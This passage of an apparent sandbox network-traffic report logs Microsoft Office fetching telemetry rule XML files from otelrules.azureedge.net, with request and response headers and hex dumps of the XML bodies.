                                                                                                                                                                                                                                                                                                                                                        2024-11-14 14:25:35 UTC1356INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 32 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 58 61 6d 6c 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 58 61 6d 6c 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701200" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Xaml" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenXaml" S="Medium" /> <F T="2">


                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                                        83192.168.2.54978813.107.246.45443
                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                        2024-11-14 14:25:35 UTC192OUTGET /rules/rule120682v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                                                                        2024-11-14 14:25:35 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                        Date: Thu, 14 Nov 2024 14:25:35 GMT
                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                                                                                                                                                                                        Content-Length: 501
                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:26:18 GMT
                                                                                                                                                                                                                                                                                                                                                        ETag: "0x8DC582BACFDAACD"
                                                                                                                                                                                                                                                                                                                                                        x-ms-request-id: f61ab913-a01e-006f-21a0-3413cd000000
                                                                                                                                                                                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                                                                        x-azure-ref: 20241114T142535Z-1749fc9bdbd2jxtthC1DFWfk5w00000002kg000000009vu7
                                                                                                                                                                                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                                        2024-11-14 14:25:35 UTC501INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 38 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 44 43 61 3d 22 50 53 55 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 41 20 54 3d 22 31 22 20 45 3d 22 54 65 6c 65 6d 65 74 72 79 53 74 61 72 74 75 70 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 32 22 20 52 3d 22 31 32 30 31 30 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 53 20 54 3d 22 33 22 20 47 3d 22 7b 62 31 36 37 36 61 63 33 2d 37 66 65 65 2d 34 34 61 39 2d 39 61 30 65 2d 64 62 62 30 62 34 39 36 65 66 61 35 7d 22 20 2f 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22
                                                                                                                                                                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120682" V="0" DC="SM" T="Subrule" DCa="PSU" xmlns=""> <S> <A T="1" E="TelemetryStartup" /> <R T="2" R="120100" /> <SS T="3" G="{b1676ac3-7fee-44a9-9a0e-dbb0b496efa5}" /> </S> <C T="


                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                                        84192.168.2.54979213.107.246.45443
                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                        2024-11-14 14:25:35 UTC192OUTGET /rules/rule701201v1s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                                                                        2024-11-14 14:25:35 UTC517INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                        Date: Thu, 14 Nov 2024 14:25:35 GMT
                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                                                                                                                                                                                        Content-Length: 1393
                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:27:51 GMT
                                                                                                                                                                                                                                                                                                                                                        ETag: "0x8DC582BE3E55B6E"
                                                                                                                                                                                                                                                                                                                                                        x-ms-request-id: 4e98fbea-b01e-0002-08d2-2c1b8f000000
                                                                                                                                                                                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                                                                        x-azure-ref: 20241114T142535Z-16547b76f7f22sh5hC1DFWyb4w0000000kr0000000008axd
                                                                                                                                                                                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                                        2024-11-14 14:25:35 UTC1393INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 32 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 58 61 6d 6c 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 58 61 6d 6c 22
                                                                                                                                                                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701201" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Xaml.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenXaml"


                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                                        85192.168.2.54979413.107.246.45443
                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                        2024-11-14 14:25:35 UTC192OUTGET /rules/rule700201v1s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                                                                        2024-11-14 14:25:36 UTC517INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                        Date: Thu, 14 Nov 2024 14:25:35 GMT
                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                                                                                                                                                                                        Content-Length: 1393
                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:27:50 GMT
                                                                                                                                                                                                                                                                                                                                                        ETag: "0x8DC582BE39DFC9B"
                                                                                                                                                                                                                                                                                                                                                        x-ms-request-id: b1270df0-501e-0035-6dd2-2cc923000000
                                                                                                                                                                                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                                                                        x-azure-ref: 20241114T142535Z-16547b76f7fkcrm9hC1DFWxdag0000000ks000000000nn5q
                                                                                                                                                                                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                                        2024-11-14 14:25:36 UTC1393INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 32 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 57 6f 72 64 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 57 6f 72 64 22
                                                                                                                                                                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700201" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Word.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenWord"


                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                                        86192.168.2.54979513.107.246.45443
                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                        2024-11-14 14:25:36 UTC192OUTGET /rules/rule700200v1s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                                                                        2024-11-14 14:25:36 UTC517INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                        Date: Thu, 14 Nov 2024 14:25:36 GMT
                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                                                                                                                                                                                        Content-Length: 1356
                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:27:43 GMT
                                                                                                                                                                                                                                                                                                                                                        ETag: "0x8DC582BDF66E42D"
                                                                                                                                                                                                                                                                                                                                                        x-ms-request-id: d5f81faf-001e-0017-2ed2-2c0c3c000000
                                                                                                                                                                                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                                                                        x-azure-ref: 20241114T142536Z-16547b76f7flf9g6hC1DFWmcx8000000097000000000k8x5
                                                                                                                                                                                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                                        2024-11-14 14:25:36 UTC1356INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 32 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 57 6f 72 64 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 57 6f 72 64 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700200" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Word" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenWord" S="Medium" /> <F T="2">


                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                                        87192.168.2.54979713.107.246.45443
                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                        2024-11-14 14:25:36 UTC192OUTGET /rules/rule702350v1s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                                                                        2024-11-14 14:25:36 UTC517INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                        Date: Thu, 14 Nov 2024 14:25:36 GMT
                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                                                                                                                                                                                        Content-Length: 1358
                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:27:54 GMT
                                                                                                                                                                                                                                                                                                                                                        ETag: "0x8DC582BE6431446"
                                                                                                                                                                                                                                                                                                                                                        x-ms-request-id: 3caab57d-601e-005c-6cd2-2cf06f000000
                                                                                                                                                                                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                                                                        x-azure-ref: 20241114T142536Z-16547b76f7fp6mhthC1DFWrggn0000000kwg00000000amwu
                                                                                                                                                                                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                                        2024-11-14 14:25:36 UTC1358INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 33 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 56 6f 69 63 65 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 56 6f 69 63 65 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20
                                                                                                                                                                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702350" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Voice" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenVoice" S="Medium" /> <F T="2">


                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                                        88192.168.2.54979613.107.246.45443
                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                        2024-11-14 14:25:36 UTC192OUTGET /rules/rule702351v1s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                                                                        2024-11-14 14:25:36 UTC515INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                        Date: Thu, 14 Nov 2024 14:25:36 GMT
                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                                                                                                                                                                                        Content-Length: 1395
                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:27:44 GMT
                                                                                                                                                                                                                                                                                                                                                        ETag: "0x8DC582BE017CAD3"
                                                                                                                                                                                                                                                                                                                                                        x-ms-request-id: 5c63f72a-901e-0067-46a3-34b5cb000000
                                                                                                                                                                                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                                                                        x-azure-ref: 20241114T142536Z-1749fc9bdbddwt7mhC1DFWssk800000000pg000000000wa0
                                                                                                                                                                                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                                                                        X-Cache-Info: L1_T2
                                                                                                                                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                                        2024-11-14 14:25:36 UTC1395INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 33 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 56 6f 69 63 65 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 56 6f 69 63
                                                                                                                                                                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702351" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Voice.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenVoic


                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                                        89192.168.2.54979813.107.246.45443
                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                        2024-11-14 14:25:36 UTC192OUTGET /rules/rule701251v1s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                                                                        2024-11-14 14:25:36 UTC515INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                        Date: Thu, 14 Nov 2024 14:25:36 GMT
                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                                                                                                                                                                                        Content-Length: 1395
                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:27:41 GMT
                                                                                                                                                                                                                                                                                                                                                        ETag: "0x8DC582BDE12A98D"
                                                                                                                                                                                                                                                                                                                                                        x-ms-request-id: 790f93ef-601e-003e-42a2-343248000000
                                                                                                                                                                                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                                                                        x-azure-ref: 20241114T142536Z-1749fc9bdbdnkwnnhC1DFWud0400000002pg000000002cu8
                                                                                                                                                                                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                                                                        X-Cache-Info: L1_T2
                                                                                                                                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                                        2024-11-14 14:25:36 UTC1395INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 32 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 56 69 73 69 6f 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 56 69 73 69
                                                                                                                                                                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701251" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Visio.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenVisi


                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                                        90192.168.2.54979913.107.246.45443
                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                        2024-11-14 14:25:36 UTC192OUTGET /rules/rule701250v1s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                                                                        2024-11-14 14:25:36 UTC538INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                        Date: Thu, 14 Nov 2024 14:25:36 GMT
                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                                                                                                                                                                                        Content-Length: 1358
                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:27:44 GMT
                                                                                                                                                                                                                                                                                                                                                        ETag: "0x8DC582BE022ECC5"
                                                                                                                                                                                                                                                                                                                                                        x-ms-request-id: 70b2909d-801e-00ac-33c1-2cfd65000000
                                                                                                                                                                                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                                                                        x-azure-ref: 20241114T142536Z-16547b76f7fxdzxghC1DFWmf7n0000000kug00000000fbeb
                                                                                                                                                                                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                                                                        X-Cache-Info: L1_T2
                                                                                                                                                                                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                                                                        Accept-Ranges: bytes
